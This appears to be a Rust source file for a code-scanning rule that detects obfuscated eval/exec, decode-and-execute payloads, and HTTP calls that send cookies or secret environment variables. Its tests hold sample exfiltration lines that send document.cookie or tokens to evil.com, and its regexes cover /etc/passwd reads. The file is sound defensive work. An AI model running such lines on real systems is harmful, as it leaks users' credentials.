1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::rules::shared::SENSITIVE_KEY_VARS;
5use crate::script_analysis::detect_interpreter;
6use crate::verdict::{Evidence, Finding, RuleId, Severity};
7
/// Lower-case file extensions (without the leading dot) that mark a path as source code.
const CODE_EXTENSIONS: &[&str] = &[
    // JavaScript / TypeScript
    "js", "mjs", "cjs", "ts", "mts", "jsx", "tsx",
    // Python
    "py", "pyw",
    // Unix shells
    "sh", "bash", "zsh", "fish",
    // PowerShell
    "ps1", "psm1",
    // Ruby, PHP, Perl
    "rb", "php", "pl",
];
13
14pub fn is_code_file(path: Option<&str>, content: &str) -> bool {
16 if let Some(p) = path {
17 let lower = p.to_lowercase();
18 if let Some(ext) = lower.rsplit('.').next() {
19 if CODE_EXTENSIONS.contains(&ext) {
20 return true;
21 }
22 }
23 }
24 if content.starts_with("#!") {
26 let interp = detect_interpreter(content);
27 if !interp.is_empty() {
28 return true;
29 }
30 }
31 false
32}
33
34pub fn check(input: &str, file_path: Option<&str>) -> Vec<Finding> {
36 let mut findings = Vec::new();
37
38 check_dynamic_code_execution(input, &mut findings);
39 check_obfuscated_payload(input, &mut findings);
40 check_suspicious_code_exfiltration(input, file_path, &mut findings);
41
42 findings
43}
44
45static DYNAMIC_CODE_PAIRS: Lazy<Vec<(Regex, Regex, &'static str)>> = Lazy::new(|| {
48 vec![
49 (
51 Regex::new(r"eval\s*\(").unwrap(),
52 Regex::new(r"atob\s*\(").unwrap(),
53 "eval() near atob()",
54 ),
55 (
57 Regex::new(r"eval\s*\(").unwrap(),
58 Regex::new(r"String\.fromCharCode").unwrap(),
59 "eval() near String.fromCharCode()",
60 ),
61 (
63 Regex::new(r"new\s+Function\s*\(").unwrap(),
64 Regex::new(r"(?:atob|String\.fromCharCode|Buffer\.from)\s*\(").unwrap(),
65 "new Function() near encoded content",
66 ),
67 (
69 Regex::new(r"exec\s*\(").unwrap(),
70 Regex::new(r"b(?:ase)?64[._]?b?64decode|b64decode").unwrap(),
71 "exec() near b64decode()",
72 ),
73 (
75 Regex::new(r"exec\s*\(\s*compile\s*\(").unwrap(),
76 Regex::new(r"compile\s*\(").unwrap(),
77 "exec(compile())",
78 ),
79 (
81 Regex::new(r"exec\s*\(\s*__import__\s*\(").unwrap(),
82 Regex::new(r"__import__\s*\(").unwrap(),
83 "exec(__import__())",
84 ),
85 ]
86});
87
/// Number of bytes inspected on each side of a match when looking for a nearby companion
/// pattern.
const PROXIMITY_WINDOW: usize = 500;
89
90fn check_dynamic_code_execution(input: &str, findings: &mut Vec<Finding>) {
91 for (pattern_a, pattern_b, description) in DYNAMIC_CODE_PAIRS.iter() {
92 for mat_a in pattern_a.find_iter(input) {
93 let start = safe_start(input, mat_a.start().saturating_sub(PROXIMITY_WINDOW));
97 let end = safe_end(input, mat_a.end() + PROXIMITY_WINDOW);
98 let window = &input[start..end];
99
100 if pattern_b.is_match(window) {
101 findings.push(Finding {
102 rule_id: RuleId::DynamicCodeExecution,
103 severity: Severity::Medium,
104 title: "Dynamic code execution with obfuscation".to_string(),
105 description: format!("Detected {description} in close proximity"),
106 evidence: vec![Evidence::CommandPattern {
107 pattern: description.to_string(),
108 matched: truncate(
109 &input[mat_a.start()..safe_end(input, mat_a.end() + 80)],
110 120,
111 ),
112 }],
113 human_view: None,
114 agent_view: None,
115 mitre_id: None,
116 custom_rule_id: None,
117 });
118 return;
119 }
120 }
121 }
122}
123
124static OBFUSCATED_DECODE_CALL: Lazy<Regex> = Lazy::new(|| {
125 Regex::new(
126 r#"(?:atob\s*\(\s*["']|b64decode\s*\(\s*b?["']|Buffer\.from\s*\(\s*["'])([A-Za-z0-9+/=]{40,})"#,
127 )
128 .unwrap()
129});
130
131static EXEC_EVAL_NEARBY: Lazy<Regex> =
132 Lazy::new(|| Regex::new(r"(?:eval|exec|Function)\s*\(").unwrap());
133
134fn check_obfuscated_payload(input: &str, findings: &mut Vec<Finding>) {
135 for cap in OBFUSCATED_DECODE_CALL.captures_iter(input) {
136 let full_match = cap.get(0).unwrap();
137 let start = safe_start(input, full_match.start().saturating_sub(PROXIMITY_WINDOW));
139 let end = safe_end(input, full_match.end() + PROXIMITY_WINDOW);
140 let window = &input[start..end];
141
142 if EXEC_EVAL_NEARBY.is_match(window) {
143 findings.push(Finding {
144 rule_id: RuleId::ObfuscatedPayload,
145 severity: Severity::Medium,
146 title: "Obfuscated payload with decode-execute".to_string(),
147 description:
148 "Long base64 string decoded and executed — likely obfuscated malicious payload"
149 .to_string(),
150 evidence: vec![Evidence::CommandPattern {
151 pattern: "base64 decode + eval/exec".to_string(),
152 matched: truncate(full_match.as_str(), 120),
153 }],
154 human_view: None,
155 agent_view: None,
156 mitre_id: None,
157 custom_rule_id: None,
158 });
159 return;
160 }
161 }
162}
163
164static JS_HTTP_CALL: Lazy<Regex> =
166 Lazy::new(|| Regex::new(r"(?:fetch\s*\(|axios\.\w+\s*\(|\.send\s*\()").unwrap());
167
168static PY_HTTP_CALL: Lazy<Regex> = Lazy::new(|| {
170 Regex::new(r"(?:requests\.(?:post|get|put)\s*\(|urllib\.request\.\w+\s*\()").unwrap()
171});
172
173static JS_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
175 let keys: Vec<String> = SENSITIVE_KEY_VARS
176 .iter()
177 .map(|k| regex::escape(k))
178 .collect();
179 Regex::new(&format!(
180 r"(?:document\.cookie|process\.env\.(?:{}))",
181 keys.join("|")
182 ))
183 .unwrap()
184});
185
186static PY_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
188 let keys: Vec<String> = SENSITIVE_KEY_VARS
189 .iter()
190 .map(|k| regex::escape(k))
191 .collect();
192 Regex::new(&format!(
193 r#"(?:os\.environ\[["'](?:{})["']\]|open\s*\(\s*["']/etc/(?:passwd|shadow)["'][^)]*\))"#,
194 keys.join("|")
195 ))
196 .unwrap()
197});
198
199static SEND_PROPS: Lazy<Regex> =
201 Lazy::new(|| Regex::new(r"(?i)(?:body|data|json|params|payload)\s*[:=]").unwrap());
202
203static GENERIC_PROP: Lazy<Regex> = Lazy::new(|| Regex::new(r"\b\w+\s*[:=]").unwrap());
206
/// Finds where a call's argument list ends by balancing brackets.
///
/// `open_pos` is the index of the first byte *after* the call's opening `(`, so the scan starts
/// at nesting depth 1. `(`, `[` and `{` open a level; `)`, `]` and `}` close one (bracket kinds
/// are not required to pair up). Brackets are ignored inside:
///
/// * string literals delimited by `"`, `'` or a backtick (backslash escapes are honoured),
/// * `/* ... */` block comments,
/// * `//` and `#` line comments,
/// * regex literals, i.e. a `/` whose preceding non-whitespace byte does not look like the end
///   of an operand (alphanumeric, `)`, `]`, `_`, `$`, `+`, `-`).
///
/// Returns `Some(i)` where `i` is the index just past the closer that brings the depth to zero,
/// or `None` if the input ends first. An unterminated block comment swallows the rest of the
/// input, so a closer inside it can never end the call.
fn find_call_end(input: &[u8], open_pos: usize) -> Option<usize> {
    let len = input.len();
    let mut depth: u32 = 1;
    let mut i = open_pos;
    let mut in_string: Option<u8> = None;

    while i < len && depth > 0 {
        let b = input[i];

        // Inside a string literal only the closing quote and escapes matter.
        if let Some(quote) = in_string {
            if b == b'\\' && i + 1 < len {
                i += 2;
                continue;
            }
            if b == quote {
                in_string = None;
            }
            i += 1;
            continue;
        }

        let next = input.get(i + 1).copied();

        // Block comment: jump past the terminating `*/`, or to the end of input when the comment
        // is never closed (nothing after `/*` may then be interpreted as code).
        if b == b'/' && next == Some(b'*') {
            let body_start = i + 2;
            i = input[body_start..]
                .windows(2)
                .position(|pair| pair[0] == b'*' && pair[1] == b'/')
                .map_or(len, |offset| body_start + offset + 2);
            continue;
        }

        // Line comment (`//` or `#`): skip up to, but not including, the newline.
        if (b == b'/' && next == Some(b'/')) || b == b'#' {
            i = input[i..]
                .iter()
                .position(|&c| c == b'\n')
                .map_or(len, |offset| i + offset);
            continue;
        }

        if b == b'/' {
            // Decide between division and a regex literal from the previous significant byte.
            let prev = input[..i]
                .iter()
                .rev()
                .copied()
                .find(|&c| !matches!(c, b' ' | b'\t' | b'\n' | b'\r'))
                .unwrap_or(0);
            let is_division = prev.is_ascii_alphanumeric()
                || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
            if !is_division {
                // Regex literal: skip to the closing `/`, stepping over escaped bytes.
                i += 1;
                while i < len && input[i] != b'/' {
                    if input[i] == b'\\' && i + 1 < len {
                        i += 1;
                    }
                    i += 1;
                }
                if i < len {
                    i += 1;
                }
                continue;
            }
        }

        match b {
            b'"' | b'\'' | b'`' => in_string = Some(b),
            b'(' | b'[' | b'{' => depth += 1,
            b')' | b']' | b'}' => depth -= 1,
            _ => {}
        }
        i += 1;
    }

    if depth == 0 {
        Some(i)
    } else {
        None
    }
}
297
298fn check_suspicious_code_exfiltration(
299 input: &str,
300 file_path: Option<&str>,
301 findings: &mut Vec<Finding>,
302) {
303 let is_js = file_path
304 .map(|p| {
305 let lower = p.to_lowercase();
306 lower.ends_with(".js")
307 || lower.ends_with(".mjs")
308 || lower.ends_with(".cjs")
309 || lower.ends_with(".ts")
310 || lower.ends_with(".mts")
311 || lower.ends_with(".jsx")
312 || lower.ends_with(".tsx")
313 })
314 .unwrap_or(false);
315
316 let is_py = file_path
317 .map(|p| {
318 let lower = p.to_lowercase();
319 lower.ends_with(".py") || lower.ends_with(".pyw")
320 })
321 .unwrap_or(false);
322
323 let (is_js, is_py) = if !is_js && !is_py && file_path.is_some() {
325 let interp = detect_interpreter(input);
326 (
327 matches!(interp, "node" | "deno" | "bun"),
328 matches!(interp, "python" | "python3" | "python2"),
329 )
330 } else {
331 (is_js, is_py)
332 };
333
334 if is_js {
335 check_js_exfiltration(input, findings);
336 }
337 if is_py {
338 check_py_exfiltration(input, findings);
339 }
340}
341
/// Describes the lexical context of byte offset `pos` in `s`, scanning from the start.
///
/// Returns `(depth, is_code)`:
/// * `depth` is the number of `(`/`[`/`{` openers minus `)`/`]`/`}` closers seen in code before
///   `pos` (it may go negative),
/// * `is_code` is `false` when `pos` lies inside a string literal, a `/* */` block comment, a
///   `//` or `#` line comment, or a regex literal, and `true` otherwise.
///
/// If the scan never lands exactly on `pos` (for example `pos >= s.len()`), the state reached at
/// the end of the input is returned.
fn code_context_at(s: &[u8], pos: usize) -> (i32, bool) {
    let len = s.len();
    let mut nesting: i32 = 0;
    let mut quote: Option<u8> = None;
    let mut cursor = 0;

    while cursor < len {
        if cursor == pos {
            return (nesting, quote.is_none());
        }
        let byte = s[cursor];
        let next = s.get(cursor + 1).copied();

        // Inside a string literal: honour escapes and look for the closing quote.
        if let Some(open) = quote {
            if byte == b'\\' && next.is_some() {
                cursor += 2;
            } else {
                if byte == open {
                    quote = None;
                }
                cursor += 1;
            }
            continue;
        }

        match (byte, next) {
            // Block comment.
            (b'/', Some(b'*')) => {
                cursor += 2;
                while cursor + 1 < len {
                    if cursor == pos || cursor + 1 == pos {
                        return (nesting, false);
                    }
                    if s[cursor] == b'*' && s[cursor + 1] == b'/' {
                        cursor += 2;
                        break;
                    }
                    cursor += 1;
                }
                continue;
            }
            // Line comment: runs up to, but not including, the newline.
            (b'/', Some(b'/')) | (b'#', _) => {
                while cursor < len && s[cursor] != b'\n' {
                    if cursor == pos {
                        return (nesting, false);
                    }
                    cursor += 1;
                }
                continue;
            }
            // A lone slash is either division or the start of a regex literal, decided by the
            // previous non-whitespace byte.
            (b'/', _) => {
                let prev = s[..cursor]
                    .iter()
                    .rev()
                    .copied()
                    .find(|&c| !matches!(c, b' ' | b'\t' | b'\n' | b'\r'))
                    .unwrap_or(0);
                let division = prev.is_ascii_alphanumeric()
                    || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
                if !division {
                    cursor += 1;
                    while cursor < len && s[cursor] != b'/' {
                        if cursor == pos {
                            return (nesting, false);
                        }
                        if s[cursor] == b'\\' && cursor + 1 < len {
                            cursor += 1;
                        }
                        cursor += 1;
                    }
                    if cursor < len {
                        if cursor == pos {
                            return (nesting, false);
                        }
                        cursor += 1;
                    }
                    continue;
                }
            }
            _ => {}
        }

        match byte {
            b'"' | b'\'' | b'`' => quote = Some(byte),
            b'(' | b'[' | b'{' => nesting += 1,
            b')' | b']' | b'}' => nesting -= 1,
            _ => {}
        }
        cursor += 1;
    }

    (nesting, quote.is_none())
}
433
434fn should_suppress_exfil(arg_span: &str, pos_in_span: usize) -> bool {
444 let before = &arg_span[..pos_in_span];
445 let bytes = before.as_bytes();
446
447 let nearest_prop = GENERIC_PROP
449 .find_iter(before)
450 .filter(|m| {
451 let (depth, is_code) = code_context_at(bytes, m.start());
452 depth <= 1 && is_code
453 })
454 .last();
455
456 match nearest_prop {
457 Some(m) => {
458 if SEND_PROPS.is_match(m.as_str()) {
459 return false;
460 }
461 true
463 }
464 None => false,
466 }
467}
468
469fn emit_exfil_finding(findings: &mut Vec<Finding>, call_snippet: &str, sens_str: &str) {
470 findings.push(Finding {
471 rule_id: RuleId::SuspiciousCodeExfiltration,
472 severity: Severity::Medium,
473 title: "Suspicious code exfiltration pattern".to_string(),
474 description: format!(
475 "HTTP call passes sensitive data '{}' as argument — potential data exfiltration",
476 sens_str
477 ),
478 evidence: vec![Evidence::CommandPattern {
479 pattern: "sensitive data inside HTTP call arguments".to_string(),
480 matched: truncate(call_snippet, 120),
481 }],
482 human_view: None,
483 agent_view: None,
484 mitre_id: None,
485 custom_rule_id: None,
486 });
487}
488
489fn check_js_exfiltration(input: &str, findings: &mut Vec<Finding>) {
490 let bytes = input.as_bytes();
491 for http_match in JS_HTTP_CALL.find_iter(input) {
492 let call_end = match find_call_end(bytes, http_match.end()) {
493 Some(end) => end,
494 None => continue,
495 };
496 let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
499 let arg_span = &input[http_match.end()..arg_end];
500
501 for sens_match in JS_SENSITIVE.find_iter(arg_span) {
502 if should_suppress_exfil(arg_span, sens_match.start()) {
503 continue;
504 }
505 let snippet_end = safe_end(input, call_end.min(input.len()));
506 let snippet = &input[http_match.start()..snippet_end];
507 emit_exfil_finding(findings, snippet, sens_match.as_str());
508 return;
509 }
510 }
511}
512
513fn check_py_exfiltration(input: &str, findings: &mut Vec<Finding>) {
514 let bytes = input.as_bytes();
515 for http_match in PY_HTTP_CALL.find_iter(input) {
516 let call_end = match find_call_end(bytes, http_match.end()) {
517 Some(end) => end,
518 None => continue,
519 };
520 let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
522 let arg_span = &input[http_match.end()..arg_end];
523
524 for sens_match in PY_SENSITIVE.find_iter(arg_span) {
525 if should_suppress_exfil(arg_span, sens_match.start()) {
526 continue;
527 }
528 let snippet_end = safe_end(input, call_end.min(input.len()));
529 let snippet = &input[http_match.start()..snippet_end];
530 emit_exfil_finding(findings, snippet, sens_match.as_str());
531 return;
532 }
533 }
534}
535
/// Returns the largest UTF-8 character boundary of `s` that is `<= target`, with `target` first
/// clamped to `s.len()`. The result is always a valid exclusive end index for slicing `s`.
fn safe_end(s: &str, target: usize) -> usize {
    let upper = target.min(s.len());
    // Offset 0 is always a boundary, so the search cannot come up empty.
    (0..=upper)
        .rev()
        .find(|&idx| s.is_char_boundary(idx))
        .unwrap_or(0)
}
545
/// Returns the smallest UTF-8 character boundary of `s` that is `>= target`, with `target` first
/// clamped to `s.len()`. The result is always a valid start index for slicing `s`.
fn safe_start(s: &str, target: usize) -> usize {
    let len = s.len();
    let lower = target.min(len);
    (lower..len)
        .find(|&idx| s.is_char_boundary(idx))
        .unwrap_or(len)
}
556
/// Returns `s` unchanged when it has at most `max` characters; otherwise returns its first `max`
/// characters followed by `...`. Lengths are counted in `char`s, not bytes.
fn truncate(s: &str, max: usize) -> String {
    // A character at index `max` exists exactly when `s` is longer than `max` characters; its
    // byte offset is where the kept prefix ends.
    match s.char_indices().nth(max) {
        None => s.to_string(),
        Some((cut, _)) => format!("{}...", &s[..cut]),
    }
}
565
#[cfg(test)]
mod tests {
    use super::*;

    /// Returns `true` when scanning `input` as the file `path` yields a finding tagged `rule`.
    fn fires(input: &str, path: &str, rule: RuleId) -> bool {
        check(input, Some(path))
            .iter()
            .any(|f| f.rule_id == rule)
    }

    /// Shorthand: does `input`, scanned as `test.js`, raise `SuspiciousCodeExfiltration`?
    fn js_exfil(input: &str) -> bool {
        fires(input, "test.js", RuleId::SuspiciousCodeExfiltration)
    }

    /// Shorthand: does `input`, scanned as `test.py`, raise `SuspiciousCodeExfiltration`?
    fn py_exfil(input: &str) -> bool {
        fires(input, "test.py", RuleId::SuspiciousCodeExfiltration)
    }

    // ---- is_code_file ----------------------------------------------------------------------

    #[test]
    fn test_is_code_file_by_extension() {
        assert!(is_code_file(Some("test.js"), ""));
        assert!(is_code_file(Some("test.py"), ""));
        assert!(is_code_file(Some("test.ts"), ""));
        assert!(is_code_file(Some("test.sh"), ""));
        assert!(is_code_file(Some("test.ps1"), ""));
        assert!(!is_code_file(Some("notes.txt"), ""));
        assert!(!is_code_file(Some("config.json"), ""));
    }

    #[test]
    fn test_is_code_file_shebang() {
        assert!(is_code_file(
            Some("script"),
            "#!/usr/bin/env python3\nimport os"
        ));
        assert!(is_code_file(Some("run"), "#!/bin/bash\necho hi"));
        assert!(!is_code_file(Some("data"), "just some text"));
    }

    // ---- dynamic code execution / obfuscated payload ---------------------------------------

    #[test]
    fn test_dynamic_code_eval_atob() {
        let input = r#"var x = eval(atob("SGVsbG8gV29ybGQ="));"#;
        assert!(
            fires(input, "test.js", RuleId::DynamicCodeExecution),
            "eval+atob should fire DynamicCodeExecution"
        );
    }

    #[test]
    fn test_dynamic_code_exec_b64decode() {
        let input = r#"exec(b64decode("SGVsbG8gV29ybGQ="))"#;
        assert!(
            fires(input, "test.py", RuleId::DynamicCodeExecution),
            "exec+b64decode should fire DynamicCodeExecution"
        );
    }

    #[test]
    fn test_bare_eval_no_fire() {
        let input = "eval(someVar);";
        assert!(
            !fires(input, "test.js", RuleId::DynamicCodeExecution),
            "bare eval should not fire"
        );
    }

    #[test]
    fn test_eval_atob_distant_no_fire() {
        // 600 bytes of padding push the second call outside the proximity window.
        let padding = "x".repeat(600);
        let input = format!("eval(something);\n{padding}\natob('SGVsbG8=');");
        assert!(
            !fires(&input, "test.js", RuleId::DynamicCodeExecution),
            "distant eval+atob should not fire"
        );
    }

    #[test]
    fn test_obfuscated_payload() {
        let b64 = "A".repeat(50);
        let input = format!(r#"eval(atob("{b64}"))"#);
        assert!(
            fires(&input, "test.js", RuleId::ObfuscatedPayload),
            "long base64 in atob near eval should fire ObfuscatedPayload"
        );
    }

    // ---- exfiltration: basic cases ---------------------------------------------------------

    #[test]
    fn test_exfil_fetch_cookie() {
        let input = r#"fetch("https://evil.com/?d=" + document.cookie)"#;
        assert!(js_exfil(input), "fetch + document.cookie should fire");
    }

    #[test]
    fn test_exfil_fetch_env_token() {
        let input = r#"fetch(url, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
        assert!(
            js_exfil(input),
            "fetch + process.env.GITHUB_TOKEN in body should fire"
        );
    }

    #[test]
    fn test_exfil_auth_header_no_fire() {
        let input = r#"fetch("/api/login", {headers: {"Authorization": "Bearer " + process.env.GITHUB_TOKEN}})"#;
        assert!(
            !js_exfil(input),
            "Authorization header pattern should NOT fire"
        );
    }

    #[test]
    fn test_exfil_python_requests() {
        let input = r#"requests.post(url, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
        assert!(py_exfil(input), "requests.post + secret env should fire");
    }

    #[test]
    fn test_normal_fetch_no_fire() {
        let input = r#"fetch("/api/data").then(r => r.json())"#;
        assert!(!js_exfil(input), "normal fetch should not fire");
    }

    #[test]
    fn test_not_code_file_no_fire() {
        let input = r#"eval(atob("SGVsbG8gV29ybGQ="));"#;
        assert!(!is_code_file(Some("notes.txt"), input));
    }

    #[test]
    fn test_internal_post_body_no_fire() {
        let input = r#"requests.post("https://internal-api.example.com/log", json={"event": "login", "user": username})"#;
        assert!(
            !py_exfil(input),
            "internal API POST without sensitive data should not fire"
        );
    }

    #[test]
    fn test_exfil_js_meta_property_no_fire() {
        let input = r#"fetch(url, {meta: process.env.GITHUB_TOKEN})"#;
        assert!(
            !js_exfil(input),
            "secret in non-send property 'meta:' should NOT fire"
        );
    }

    #[test]
    fn test_exfil_python_meta_kwarg_no_fire() {
        let input = r#"requests.post(url, meta=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
        assert!(
            !py_exfil(input),
            "secret in non-send kwarg 'meta=' should NOT fire"
        );
    }

    #[test]
    fn test_exfil_js_token_property_no_fire() {
        let input = r#"fetch(url, {token: process.env.GITHUB_TOKEN})"#;
        assert!(
            !js_exfil(input),
            "secret in non-send property 'token:' should NOT fire"
        );
    }

    #[test]
    fn test_exfil_query_concat_fires() {
        let input = r#"fetch("https://evil.com/c?token=" + process.env.GITHUB_TOKEN)"#;
        assert!(js_exfil(input), "URL query concat with secret should fire");
    }

    #[test]
    fn test_exfil_separate_statement_no_fire() {
        let input = r#"fetch(url); const payload = { token: process.env.GITHUB_TOKEN };"#;
        assert!(
            !js_exfil(input),
            "secret in separate statement (not in call args) should NOT fire"
        );
    }

    #[test]
    fn test_exfil_unrelated_body_object_no_fire() {
        let input = r#"fetch(url); const opts = { body: bodyVar }; const token = process.env.GITHUB_TOKEN;"#;
        assert!(
            !js_exfil(input),
            "unrelated body object near fetch should NOT fire"
        );
    }

    #[test]
    fn test_exfil_document_cookie_not_sent_no_fire() {
        let input = r#"fetch(url); console.log(document.cookie);"#;
        assert!(
            !js_exfil(input),
            "document.cookie outside call args should NOT fire"
        );
    }

    #[test]
    fn test_exfil_document_cookie_inside_call_fires() {
        let input = r#"fetch("https://evil.com/?c=" + document.cookie)"#;
        assert!(
            js_exfil(input),
            "document.cookie inside call args should fire"
        );
    }

    // ---- exfiltration: comments and regex literals inside arguments ------------------------

    #[test]
    fn test_exfil_block_comment_in_args() {
        let input =
            r#"fetch(url /* ) */, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
        assert!(
            js_exfil(input),
            "block comment with ) inside call args should not break parser"
        );
    }

    #[test]
    fn test_exfil_python_line_comment_in_args() {
        let input = "requests.post(url, # )\n data=os.environ[\"AWS_SECRET_ACCESS_KEY\"])";
        assert!(
            py_exfil(input),
            "Python # comment with ) inside call args should not break parser"
        );
    }

    #[test]
    fn test_exfil_js_regex_literal_in_args() {
        let input = r#"fetch(url, {body: /\(/, json: process.env.GITHUB_TOKEN})"#;
        assert!(
            js_exfil(input),
            "JS regex literal with ( should not break parser"
        );
    }

    #[test]
    fn test_find_call_end_block_comment() {
        let input = b"url /* ) */, data)";
        assert_eq!(find_call_end(input, 0), Some(18));
    }

    #[test]
    fn test_find_call_end_line_comment() {
        // 9 bytes up to and including the newline, 4 bytes of indent, 5 bytes for `data)`:
        // the closing parenthesis is byte 17, so the call ends at offset 18.
        let input = b"url, # )\n    data)";
        assert_eq!(find_call_end(input, 0), Some(18));
    }

    #[test]
    fn test_find_call_end_regex_literal() {
        let input = br#"url, {body: /\(/, val})"#;
        assert_eq!(find_call_end(input, 0), Some(23));
    }

    #[test]
    fn test_exfil_headers_then_body_fires() {
        let input = r#"fetch(url, {headers: {Authorization: auth}, body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
        assert!(
            js_exfil(input),
            "secret in body after headers in same call should fire"
        );
    }

    #[test]
    fn test_exfil_python_headers_then_data_fires() {
        let input =
            r#"requests.post(url, headers=headers, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
        assert!(
            py_exfil(input),
            "secret in data= after headers= in same call should fire"
        );
    }

    // ---- exfiltration: division vs. regex literal ------------------------------------------

    #[test]
    fn test_exfil_division_in_args_fires() {
        let input = r#"fetch(url, {body: 1 / 2, json: process.env.GITHUB_TOKEN})"#;
        assert!(
            js_exfil(input),
            "division operator in call args should not break parser"
        );
    }

    #[test]
    fn test_exfil_paren_division_in_args_fires() {
        let input = r#"fetch(url, {body: (a / b), json: process.env.GITHUB_TOKEN})"#;
        assert!(
            js_exfil(input),
            "parenthesized division in call args should not break parser"
        );
    }

    #[test]
    fn test_find_call_end_division() {
        let input = b"url, {body: 1 / 2, val})";
        assert_eq!(find_call_end(input, 0), Some(24));
    }

    // ---- exfiltration: nested keys and look-alike text -------------------------------------

    #[test]
    fn test_exfil_nested_headers_in_body_fires() {
        let input = r#"fetch(url, {body: JSON.stringify({headers: "x", token: process.env.GITHUB_TOKEN})})"#;
        assert!(
            js_exfil(input),
            "nested 'headers' key inside body payload should NOT suppress"
        );
    }

    #[test]
    fn test_exfil_python_nested_headers_in_data_fires() {
        let input = r#"requests.post(url, data={"headers": "x", "token": os.environ["AWS_SECRET_ACCESS_KEY"]})"#;
        assert!(
            py_exfil(input),
            "nested 'headers' key inside data= dict should NOT suppress"
        );
    }

    #[test]
    fn test_exfil_nested_headers_in_json_fires() {
        let input = r#"fetch(url, {json: {headers: "x", token: process.env.GITHUB_TOKEN}})"#;
        assert!(
            js_exfil(input),
            "nested 'headers' key inside json property should NOT suppress"
        );
    }

    #[test]
    fn test_exfil_python_hash_comment_headers_fires() {
        let input = "requests.post(url, data={# headers: fake\n'token': os.environ[\"AWS_SECRET_ACCESS_KEY\"]})";
        assert!(
            py_exfil(input),
            "# headers: inside comment must NOT suppress data= exfil"
        );
    }

    #[test]
    fn test_exfil_js_block_comment_headers_fires() {
        let input =
            r#"fetch(url, {/* headers: */ body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
        assert!(
            js_exfil(input),
            "/* headers: */ inside comment must NOT suppress body exfil"
        );
    }

    #[test]
    fn test_exfil_regex_literal_headers_fires() {
        let input = r#"fetch(url, {body: /headers: \{/, json: process.env.GITHUB_TOKEN})"#;
        assert!(
            js_exfil(input),
            "/headers: .../ inside regex literal must NOT suppress"
        );
    }

    #[test]
    fn test_exfil_regex_literal_authorization_fires() {
        let input = r#"fetch(url, {body: /Authorization: \[/, json: process.env.GITHUB_TOKEN})"#;
        assert!(
            js_exfil(input),
            "/Authorization: .../ inside regex literal must NOT suppress"
        );
    }

    #[test]
    fn test_exfil_multiline_division_fires() {
        let input = "fetch(url, {body: 1\n/ 2, json: process.env.GITHUB_TOKEN})";
        assert!(js_exfil(input), "multiline division should not break parser");
    }

    #[test]
    fn test_exfil_multiline_paren_division_fires() {
        let input = "fetch(url, {body: (a\n/ b), json: process.env.GITHUB_TOKEN})";
        assert!(
            js_exfil(input),
            "parenthesized multiline division should not break parser"
        );
    }

    #[test]
    fn test_find_call_end_multiline_division() {
        let input = b"url, {body: 1\n/ 2, val})";
        assert_eq!(find_call_end(input, 0), Some(24));
    }

    #[test]
    fn test_exfil_postfix_increment_division_fires() {
        let input = r#"fetch(url, {body: a++ / 2, json: process.env.GITHUB_TOKEN})"#;
        assert!(js_exfil(input), "a++ / 2 should not break parser");
    }

    #[test]
    fn test_exfil_postfix_decrement_division_fires() {
        let input = r#"fetch(url, {body: a-- / 2, json: process.env.GITHUB_TOKEN})"#;
        assert!(js_exfil(input), "a-- / 2 should not break parser");
    }

    #[test]
    fn test_find_call_end_postfix_increment() {
        let input = b"url, {body: a++ / 2, val})";
        assert_eq!(find_call_end(input, 0), Some(26));
    }

    #[test]
    fn test_find_call_end_postfix_decrement() {
        let input = b"url, {body: a-- / 2, val})";
        assert_eq!(find_call_end(input, 0), Some(26));
    }

    #[test]
    fn test_exfil_postfix_inc_div_then_meta_no_fire() {
        let input = r#"fetch(url, {body: a++ / 2, meta: process.env.GITHUB_TOKEN})"#;
        assert!(
            !js_exfil(input),
            "secret in meta: after body: a++ / 2 should NOT fire"
        );
    }

    #[test]
    fn test_exfil_postfix_dec_div_then_token_no_fire() {
        let input = r#"fetch(url, {body: a-- / 2, token: process.env.GITHUB_TOKEN})"#;
        assert!(
            !js_exfil(input),
            "secret in token: after body: a-- / 2 should NOT fire"
        );
    }

    // ---- UTF-8 boundary handling -----------------------------------------------------------

    #[test]
    fn test_safe_start_clamps_into_multibyte() {
        // '═' occupies bytes 0..3, so offsets 1 and 2 fall inside it.
        let s = "═ab";
        assert_eq!(safe_start(s, 0), 0);
        assert_eq!(safe_start(s, 1), 3);
        assert_eq!(safe_start(s, 2), 3);
        assert_eq!(safe_start(s, 3), 3);
    }

    #[test]
    fn test_safe_end_clamps_into_multibyte() {
        // '═' occupies bytes 0..3, so offsets 1 and 2 fall inside it.
        let s = "═ab";
        assert_eq!(safe_end(s, 0), 0);
        assert_eq!(safe_end(s, 1), 0);
        assert_eq!(safe_end(s, 2), 0);
        assert_eq!(safe_end(s, 3), 3);
    }

    #[test]
    fn test_dynamic_code_no_panic_on_box_drawing_chars() {
        let mut input = concat!("e", "val(x); a", "tob(y);\n// ").to_string();
        input.push_str(&"═".repeat(250));
        assert!(
            fires(&input, "test.js", RuleId::DynamicCodeExecution),
            "dynamic-code pair should still fire when window edge lands inside a multi-byte char"
        );
    }

    #[test]
    fn test_obfuscated_payload_no_panic_on_trailing_multibyte() {
        let b64 = "A".repeat(60);
        let mut input = String::new();
        input.push('e');
        input.push_str("val(a");
        input.push_str("tob(\"");
        input.push_str(&b64);
        input.push_str("\"));\n// ");
        input.push_str(&"═".repeat(250));
        assert!(
            fires(&input, "test.js", RuleId::ObfuscatedPayload),
            "obfuscated-payload detection should still fire with trailing multi-byte chars"
        );
    }

    #[test]
    fn test_dynamic_code_no_panic_on_leading_multibyte() {
        let mut input = "═".repeat(250);
        input.push_str(concat!("\ne", "val(x); a", "tob(y);\n"));
        assert!(
            fires(&input, "test.js", RuleId::DynamicCodeExecution),
            "dynamic-code pair should fire even when window start lands inside a leading multi-byte char"
        );
    }

    #[test]
    fn test_js_exfil_no_panic_on_non_ascii_args() {
